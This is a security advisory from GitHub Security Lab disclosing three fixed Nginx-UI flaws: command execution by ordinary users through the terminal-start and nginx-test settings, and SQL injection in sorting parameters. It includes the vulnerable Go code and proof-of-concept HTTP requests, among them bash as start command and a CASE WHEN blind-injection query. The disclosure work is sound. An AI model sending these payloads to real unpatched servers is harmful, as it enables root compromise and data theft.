Coordinated Disclosure Timeline
- 2023-12-19: Opened GHSA-8r25-68wm-jw35, GHSA-pxmr-q2x3-9x9m, GHSA-h374-mm57-879c through Private Vulnerability Reporting.
- 2023-12-19: GHSA-8r25-68wm-jw35 fixed in 827e76c
- 2023-12-19: GHSA-h374-mm57-879c fixed in ec93ab0
- 2023-12-19: GHSA-pxmr-q2x3-9x9m fixed in 827e76c
Summary
Nginx-UI is a web interface to manage Nginx configurations. It is vulnerable to arbitrary command execution by abusing the configuration settings, and is also vulnerable to SQL injection.
Project
Nginx-UI
Tested Version
Details
Issue 1: Authenticated (user role) arbitrary command execution by modifying start_cmd setting (GHSL-2023-268)
The Home > Preference page exposes a list of system settings such as Run Mode, Jwt Secret, Node Secret and Terminal Start Command. The latter is used to specify the command to be executed when a user opens a terminal from the web interface. While the UI doesn’t allow users to modify the Terminal Start Command setting, it is possible to do so by sending a request to the API.
func InitPrivateRouter(r *gin.RouterGroup) {
r.GET("settings", GetSettings)
r.POST("settings", SaveSettings)
...
}
The SaveSettings function is used to save the settings. It is protected by the authRequired middleware, which requires a valid JWT token or a X-Node-Secret which must equal the Node Secret configuration value. However, given the lack of authorization roles, any authenticated user can modify the settings.
The SaveSettings function is defined as follows:
func SaveSettings(c *gin.Context) {
var json struct {
Server settings.Server `json:"server"`
...
}
...
settings.ServerSettings = json.Server
...
err := settings.Save()
...
}
The Terminal Start Command setting is stored as settings.ServerSettings.StartCmd. By spawning a terminal with Pty, the StartCmd setting is used:
func Pty(c *gin.Context) {
...
p, err := pty.NewPipeLine(ws)
...
}
The NewPipeLine function is defined as follows:
func NewPipeLine(conn *websocket.Conn) (p *Pipeline, err error) {
c := exec.Command(settings.ServerSettings.StartCmd)
...
This issue was found using CodeQL for Go: Command built from user-controlled sources.
Impact
This issue may lead to authenticated Remote Code Execution, Privilege Escalation, and Information Disclosure.
Proof of Concept
Based on this setup using
uozi/nginx-ui:v2.0.0-beta.7.
- Login as a newly created user.
- Send the following request to modify the settings with
"start_cmd":"bash":
POST /api/settings HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 512
Authorization: <<JWT TOKEN>>
Content-Type: application/json
{"nginx":{"access_log_path":"","error_log_path":"","config_dir":"","pid_path":"","test_config_cmd":"","reload_cmd":"","restart_cmd":""},"openai":{"base_url":"","token":"","proxy":"","model":""},"server":{"http_host":"0.0.0.0","http_port":"9000","run_mode":"debug","jwt_secret":"...","node_secret":"...","http_challenge_port":"9180","email":"...","database":"foo","start_cmd":"bash","ca_dir":"","demo":false,"page_size":10,"github_proxy":""}}
- Open a terminal from the web interface and execute arbitrary commands as
root:root@1de46642d108:/app# id uid=0(root) gid=0(root) groups=0(root)
Issue 2: Authenticated (user role) remote command execution by modifying nginx settings (GHSL-2023-269)
The Home > Preference page exposes a small list of nginx settings such as Nginx Access Log Path and Nginx Error Log Path. However, the API also exposes test_config_cmd, reload_cmd and restart_cmd. While the UI doesn’t allow users to modify any of these settings, it is possible to do so by sending a request to the API.
func InitPrivateRouter(r *gin.RouterGroup) {
r.GET("settings", GetSettings)
r.POST("settings", SaveSettings)
...
}
The SaveSettings function is used to save the settings. It is protected by the authRequired middleware, which requires a valid JWT token or a X-Node-Secret which must equal the Node Secret configuration value. However, given the lack of authorization roles, any authenticated user can modify the settings.
The SaveSettings function is defined as follows:
func SaveSettings(c *gin.Context) {
var json struct {
...
Nginx settings.Nginx `json:"nginx"`
...
}
...
settings.NginxSettings = json.Nginx
...
err := settings.Save()
...
}
The test_config_cmd setting is stored as settings.NginxSettings.TestConfigCmd. When the application wants to test the nginx configuration, it uses the TestConf function:
func TestConf() (out string) {
if settings.NginxSettings.TestConfigCmd != "" {
out = execShell(settings.NginxSettings.TestConfigCmd)
return
}
out = execCommand("nginx", "-t")
return
}
The execShell function is defined as follows:
func execShell(cmd string) (out string) {
bytes, err := exec.Command("/bin/sh", "-c", cmd).CombinedOutput()
out = string(bytes)
if err != nil {
out += " " + err.Error()
}
return
}
Where the cmd argument is user-controlled and is passed to /bin/sh -c.
This issue was found using CodeQL for Go: Command built from user-controlled sources.
Impact
This issue may lead to authenticated Remote Code Execution, Privilege Escalation, and Information Disclosure.
Proof of Concept
Based on this setup using
uozi/nginx-ui:v2.0.0-beta.7.
- Login as a newly created user.
- Send the following request to modify the settings with
"test_config_cmd":"touch /tmp/pwned".
POST /api/settings HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 528
Authorization: <<JWT TOKEN>
Content-Type: application/json
{"nginx":{"access_log_path":"","error_log_path":"","config_dir":"","pid_path":"","test_config_cmd":"touch /tmp/pwned","reload_cmd":"","restart_cmd":""},"openai":{"base_url":"","token":"","proxy":"","model":""},"server":{"http_host":"0.0.0.0","http_port":"9000","run_mode":"debug","jwt_secret":"foo","node_secret":"foo","http_challenge_port":"9180","email":"foo","database":"foo","start_cmd":"","ca_dir":"","demo":false,"page_size":10,"github_proxy":""}}
- Add a new site in
Home > Manage Sites > Add Sitewith random data. The previously-modifiedtest_config_cmdsetting will be used when the application tries to test the nginx configuration. - Verify that
/tmp/pwnedexists.$ docker exec -it $(docker ps -q) ls -al /tmp -rw-r--r-- 1 root root 0 Dec 14 21:10 pwned
Issue 3: Authenticated (user role) SQL injection in OrderAndPaginate (GHSL-2023-270)
The OrderAndPaginate function is used to order and paginate data. It is defined as follows:
func OrderAndPaginate(c *gin.Context) func(db *gorm.DB) *gorm.DB {
return func(db *gorm.DB) *gorm.DB {
sort := c.DefaultQuery("order", "desc")
order := fmt.Sprintf("`%s` %s", DefaultQuery(c, "sort_by", "id"), sort)
db = db.Order(order)
...
}
}
By using DefaultQuery, the "desc" and "id" values are used as default values if the query parameters are not set. Thus, the order and sort_by query parameter are user-controlled and are being appended to the order variable without any sanitization.
The same happens with SortOrder, but it doesn’t seem to be used anywhere.
func SortOrder(c *gin.Context) func(db *gorm.DB) *gorm.DB {
return func(db *gorm.DB) *gorm.DB {
sort := c.DefaultQuery("order", "desc")
order := fmt.Sprintf("`%s` %s", DefaultQuery(c, "sort_by", "id"), sort)
return db.Order(order)
}
}
This issue was found using CodeQL for Go: Database query built from user-controlled sources.
Impact
This issue may lead to Information Disclosure
Proof of Concept
Based on this setup using
uozi/nginx-ui:v2.0.0-beta.7.
In order to exploit this issue, we need to find a place where the OrderAndPaginate function is used. We can find it in the GET /api/dns_credentials endpoint.
func GetDnsCredentialList(c *gin.Context) {
cosy.Core[model.DnsCredential](c).SetFussy("provider").PagingList()
}
The PagingList function is defined as follows:
func (c *Ctx[T]) PagingList() {
data, ok := c.PagingListData()
if ok {
c.ctx.JSON(http.StatusOK, data)
}
}
And the PagingListData function is defined as follows:
func (c *Ctx[T]) PagingListData() (*model.DataList, bool) {
result, ok := c.result()
if !ok {
return nil, false
}
result = result.Scopes(c.OrderAndPaginate())
...
}
Using the following request, an attacker can retrieve arbitrary values by checking the order used by the query. That is, the result of the comparison will make the response to be ordered in a specific way.
GET /api/dns_credentials?sort_by=(CASE+WHEN+(SELECT+1)=1+THEN+id+ELSE+updated_at+END)+ASC+--+ HTTP/1.1
Host: 127.0.0.1:8080
Authorization: <<JWT TOKEN>
You can notice the order change by changing =1 to =2, and so the comparison will return false and the order will be updated_at instead of id.
Credit
These issues were discovered and reported by GHSL team member @jorgectf (Jorge Rosillo).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-268, GHSL-2023-269, or GHSL-2023-270 in any communication regarding these issues.